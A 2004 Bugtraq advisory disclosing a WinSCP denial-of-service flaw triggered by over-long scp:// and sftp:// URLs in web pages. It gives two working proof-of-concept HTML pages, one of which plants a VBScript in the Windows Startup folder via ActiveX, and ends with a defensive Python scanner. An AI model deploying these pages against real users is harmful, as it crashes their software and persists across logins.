Date: 15 Apr 2004 06:17:04 -0000
From: Luca Ercoli <luca.e@...web.com>
To: bugtraq@...urityfocus.com
Subject: WinSCP Denial of Service

Package: WinSCP
Auth: http://winscp.sourceforge.net
Version(s): 3.5.6 (prior versions may also be vulnerable)
Vulnerability: Denial of Service

What’s WinSCP:

“WinSCP is an open source SFTP (SSH File Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH (Secure SHell). Its main function is safe copying of files between a local and a remote computer.”

Vulnerability Description:

A default installation of WinSCP provides the user with functionality to handle sftp:// and scp:// addresses. The vulnerability exists due to the way the application handles long URLs. A malformed scp:// or sftp:// address embedded in an HTML tag causes the WinSCP application to exhaust CPU and memory resources. The attacker would need the ability to convince the user to visit a web site he controlled or open an HTML e-mail he had prepared. During the denial of service, WinSCP will not display any GUI.

Goal:

An attacker may use this flaw to prevent the users of the attacked host from working properly.
Practical Examples:

------ WinSCP_DoS1.html --------
<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>
<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
</HEAD>
<BODY>
</BODY>
</HTML>
----------------------------------

-------- WinSCP_DoS2.html -------
<html>
<head>
<title>WinSCP DoS</title>
<script language="JScript">
var WshShell = new ActiveXObject("WScript.Shell");
strSU = WshShell.SpecialFolders("StartUp");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);
vibas.WriteLine("Dim shell");
vibas.WriteLine("Dim quote");
vibas.WriteLine("Dim DoS");
vibas.WriteLine("Dim param");
vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
vibas.WriteLine("quote = Chr(34)");
vibas.WriteLine("pgm = \"explorer\"");
vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");
vibas.Close();
</script>
</head>
</html>
----------------------------------

Credits:

--
Luca Ercoli <luca.e [at] seeweb.com>
Seeweb http://www.seeweb.com
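
A defensive check for the condition described in the advisory above, added here as an example and not part of the original post: a Python filter, suitable for a mail or web gateway, that flags HTML carrying an over-long scp:// or sftp:// URL in an attribute or in script text. The 256-character threshold, the function and class names, and the sample document are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

MAX_URL_LEN = 256  # assumption: longest scp/sftp URL accepted as legitimate
HANDLER_URL = re.compile(r"\b(?:scp|sftp)://[^\s\"'<>\\]*", re.IGNORECASE)


class HandlerUrlScanner(HTMLParser):
    """Records over-long scp:// and sftp:// URLs in attributes and element text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []   # (location, url_length) tuples
        self._tag = None     # most recently opened element

    def _scan(self, where, text):
        for match in HANDLER_URL.finditer(text or ""):
            if len(match.group(0)) > MAX_URL_LEN:
                self.findings.append((where, len(match.group(0))))

    def handle_starttag(self, tag, attrs):
        self._tag = tag
        for name, value in attrs:   # value is None for bare attributes
            self._scan(f"<{tag} {name}>", value)

    def handle_data(self, data):    # includes <script> bodies
        self._scan(f"<{self._tag}> text", data)


def scan_html(document):
    """Return a list of (location, length) for each suspicious URL found."""
    scanner = HandlerUrlScanner()
    scanner.feed(document)
    scanner.close()
    return scanner.findings


# Constructed sample: one ordinary link plus two over-long handler URLs.
SAMPLE = (
    '<html><head>'
    '<meta http-equiv="Refresh" content="0; URL=sftp://' + "A" * 600 + '">'
    '<script>var p = "scp://' + "A" * 600 + '";</script></head>'
    '<body><a href="sftp://files.example.org/pub/readme.txt">docs</a></body></html>'
)

if __name__ == "__main__":
    for where, length in scan_html(SAMPLE):
        print(f"{where}: handler URL of {length} characters")
```

The ordinary link in the sample is not reported; only URLs longer than the threshold are.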